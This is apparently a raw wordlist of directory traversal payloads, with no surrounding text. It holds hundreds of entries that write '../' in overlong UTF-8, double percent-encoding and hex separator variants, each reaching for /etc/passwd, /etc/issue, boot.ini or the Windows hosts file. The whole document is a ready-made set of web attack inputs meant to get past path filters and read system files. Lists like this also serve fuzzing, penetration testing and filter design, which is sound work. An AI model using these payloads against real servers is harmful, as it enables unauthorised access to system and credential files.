-%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afissue -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%af%e0%80%ae%e0%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afboot.ini -%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%af%e0%80%ae%e0%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/issue -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/boot.ini -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/system32/drivers/etc/hosts -%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\issue -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\boot.ini -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\windows\system32\drivers\etc\hosts -%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fissue -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fboot.ini -%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cpasswd -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cetc%5cissue -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cboot.ini -%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5c%25c0%25ae%25c0%25ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fetc0x2fissue -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fboot.ini -%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2f%25c0%25ae%25c0%25ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd -%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd 